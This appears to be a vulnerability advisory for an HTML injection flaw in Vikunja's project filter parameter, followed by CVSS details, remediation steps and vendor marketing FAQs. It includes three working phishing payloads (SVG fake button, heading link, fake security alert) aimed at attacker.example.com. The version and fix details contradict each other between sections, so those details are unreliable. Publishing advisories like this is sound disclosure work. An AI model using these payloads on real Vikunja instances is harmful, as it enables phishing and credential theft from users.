Summary
Vikunja is an open-source self-hosted task management platform with 3,300+ GitHub stars. A reflected HTML injection vulnerability exists in the Projects module where the filter URL parameter is rendered into the DOM without output encoding when the user clicks "Filter." While <script> and <iframe> are blocked, <svg>, <a>, and formatting tags (<h1>, <b>, <u>) render without restriction, enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin.
Attack flow: Attacker shares a crafted project filter link (routine Vikunja workflow) → victim opens it → victim clicks "Filter" (standard UI action) → phishing content renders inside trusted Vikunja interface.
Affected Component
| Field | Detail |
|---|---|
| Application | Vikunja v1.1.0 |
| Module | Projects |
| Endpoint | /projects/-1/-1?filter=PAYLOAD&page=1 |
| Parameter | filter (GET) |
| Trigger | Click "Filter" button |
| Stack | Go backend, Vue.js + TypeScript frontend |
| Blocked | <script>, <iframe> |
| Allowed | <svg>, <a>, <rect>, <text>, <h1>, <b>, <u> |
Proof-of-Concept
PoC-1: SVG Phishing Button (Highest Impact)
Renders a styled, clickable red button redirecting to attacker domain. Visually indistinguishable from a real UI button.
http://localhost:3456/projects/-1/-1?filter=%3Csvg%20width%3D%22400%22%20height%3D%2260%22%3E%3Ca%20href%3D%22https%3A%2F%2Fattacker.example.com%2Flogin%22%3E%3Crect%20width%3D%22400%22%20height%3D%2260%22%20rx%3D%224%22%20fill%3D%22%23d32f2f%22%3E%3C%2Frect%3E%3Ctext%20x%3D%22200%22%20y%3D%2237%22%20text-anchor%3D%22middle%22%20fill%3D%22white%22%20font-size%3D%2216%22%3ESession%20Expired%20-%20Click%20to%20Re-authenticate%3C%2Ftext%3E%3C%2Fa%3E%3C%2Fsvg%3E&page=1
Raw payload:
<svg width="400" height="60"><a href="https://attacker.example.com/login"><rect width="400" height="60" rx="4" fill="#d32f2f"></rect><text x="200" y="37" text-anchor="middle" fill="white" font-size="16">Session Expired - Click to Re-authenticate</text></a></svg>
PoC-2: Phishing Link via Heading + Anchor
Prominent clickable link styled as urgent system message.
http://localhost:3456/projects/-1/-1?filter=%3Ch1%3E%3Ca%20href%3D%22https%3A%2F%2Fattacker.example.com%2Flogin%22%3E%E2%9A%A0%20Your%20session%20has%20expired.%20Click%20here%20to%20sign%20in%20again.%3C%2Fa%3E%3C%2Fh1%3E&page=1
Raw payload:
<h1><a href="https://attacker.example.com/login">⚠ Your session has expired. Click here to sign in again.</a></h1>
PoC-3: Content Spoofing, Fake Security Alert
Fake security warning directing victim to attacker-controlled contact.
http://localhost:3456/projects/-1/-1?filter=%3Ch1%3E%3Cu%3E%3Cb%3E%E2%9A%A0%20SECURITY%20ALERT%3C%2Fb%3E%3C%2Fu%3E%3C%2Fh1%3E%3Cb%3EUnauthorized%20access%20detected%20on%20your%20account.%20Your%20account%20will%20be%20suspended%20in%2024%20hours.%20Contact%20IT%20security%20immediately%20at%20security%40attacker.example.com%20or%20visit%20https%3A%2F%2Fattacker.example.com%2Fverify%20to%20confirm%20your%20identity.%3C%2Fb%3E&page=1
Raw payload:
<h1><u><b>⚠ SECURITY ALERT</b></u></h1><b>Unauthorized access detected on your account. Your account will be suspended in 24 hours. Contact IT security immediately at [email protected] or visit https://attacker.example.com/verify to confirm your identity.</b>
Root Cause
The filter parameter is inserted into the DOM as raw HTML, likely via Vue.js v-html or innerHTML. A partial denylist strips <script> and <iframe> but does not encode output or filter SVG/anchor/formatting elements. No allowlist, no output encoding, no input syntax validation exists.
CWE & CVSS
CWE-79 (Primary), Improper Neutralization of Input During Web Page Generation
CWE-80 (Secondary), Improper Neutralization of Script-Related HTML Tags
CVSS 3.1: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N, 6.1 (Medium)
Score understates risk because: user interactions are routine workflow (not security decisions), SVG enables pixel-perfect UI spoofing, self-hosted deployments expose internal infrastructure, and API credential equivalence enables automated data exfiltration.
References
- Vikunja Repository: https://github.com/go-vikunja/vikunja
- CWE-79: https://cwe.mitre.org/data/definitions/79.html
- CWE-80: https://cwe.mitre.org/data/definitions/80.html
- OWASP XSS Prevention: https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Scripting_Prevention_Cheat_Sheet.html
Conclusion
The filter parameter in Vikunja's Projects module renders unsanitized HTML into the DOM, enabling SVG-based phishing buttons, external redirect links, and content spoofing within the trusted application origin. The attack requires only routine workflow actions, opening a shared link and clicking "Filter." The fix is a single-line change: replacing v-html with v-text in the Vue.js rendering logic. Given Vikunja's adoption (3,300+ stars), self-hosted deployment model, and API credential equivalence, this warrants prompt remediation.
A fix is available at https://github.com/go-vikunja/vikunja/releases/tag/v2.0.0.
Impact
| Impact | Description |
|---|---|
| SVG Phishing Buttons | Pixel-perfect fake buttons redirect to credential harvesting pages |
| External Redirect | Anchor tags point to attacker domains from within trusted origin |
| Content Spoofing | Fake alerts manipulate users into contacting attacker channels |
| Self-Hosted Risk | Compromised credentials may grant access to internal infrastructure |
| API Access | Same credentials grant full REST API access for data exfiltration |
| No Logging | GET-based reflected injection leaves no distinguishable server logs |
Not Self-XSS: Payload is attacker-controlled via URL, delivered through routine link sharing, triggered by standard UI interaction. Victim performs no security-relevant decision.
Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.
CVE-2026-27116 has a CVSS score of 6.1 (Medium). The vector is network-reachable, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
| Priority | Action |
|---|---|
| P0 | Replace v-html with v-text or {{ }} interpolation (auto-escapes HTML) |
| P0 | HTML entity encode the filter value at rendering point |
| P1 | Replace denylist with DOMPurify strict allowlist or eliminate HTML rendering of filter values |
| P1 | Deploy CSP with form-action 'self' |
| P2 | Server-side input validation, reject filter values not matching expected syntax |
Frequently Asked Questions
- What is CVE-2026-27116? CVE-2026-27116 is a medium-severity cross-site scripting (XSS) vulnerability in code.vikunja.io/api (go), affecting versions <= 0.24.6. No fixed version is listed yet. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
- How severe is CVE-2026-27116? CVE-2026-27116 has a CVSS score of 6.1 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of code.vikunja.io/api are affected by CVE-2026-27116? code.vikunja.io/api (go) versions <= 0.24.6 is affected.
- Is there a fix for CVE-2026-27116? No fixed version is listed for CVE-2026-27116 yet. Monitor the advisory for updates and apply mitigations in the interim.
- Is CVE-2026-27116 exploitable, and should I be worried? Whether CVE-2026-27116 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-27116 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-27116? No fixed version is listed yet. In the interim: Validate and encode untrusted input before rendering it as HTML. Applying a Content Security Policy reduces the impact if encoding is bypassed.